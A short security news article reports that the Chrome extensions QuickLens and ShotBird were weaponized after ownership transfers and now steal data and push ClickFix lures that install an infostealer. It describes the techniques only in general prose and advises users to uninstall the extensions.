Popular Chrome Extensions Weaponized Following Ownership Transfers To Facilitate Data Theft And Malware Injection

Chrome extensions QuickLens and ShotBird were weaponized after ownership transfers to steal data and inject malware. Users are advised to uninstall immediately.

By: AXL Media

Published: Mar 9, 2026, 8:30 AM EDT

Source: The information in this article was sourced from The Hacker News.

The Extension Supply Chain Crisis

A new wave of cyber attacks is exploiting the trust users place in "Featured" browser extensions through a tactic known as ownership transfer. Investigators found that extensions originally created by reputable developers are being sold to threat actors who then push malicious updates to thousands of existing users. Because these extensions were previously vetted by the Chrome Web Store, the weaponized updates often bypass initial scrutiny, allowing attackers to embed persistent data collection mechanisms directly into the victim's daily browsing activities.

Technical Execution of the QuickLens Compromise

QuickLens, a tool designed for Google Lens searches with over 7,000 users, was sold and subsequently updated to strip security headers like X-Frame-Options from HTTP responses. This modification allows malicious scripts to bypass Content Security Policy (CSP) protections and make unauthorized requests to external domains. The extension further employs a sophisticated fingerprinting technique to detect the user's operating system and location, polling a command-and-control (C2) server every five minutes to execute remote JavaScript via hidden image elements.

ShotBird and the ClickFix Malware Pivot

The extension ShotBird, used for scrolling screenshots, remains accessible on the web store despite being flagged for delivering "ClickFix" style lures. Once the malicious update is active, it triggers a fake Google Chrome update prompt that tricks users into running PowerShell commands via the Windows Run dialog. This process installs an executable named "googleupdate.exe," which functions as a host-level infostealer capable of capturing data from HTML input fields, including credit card details, PINs, and government identifiers.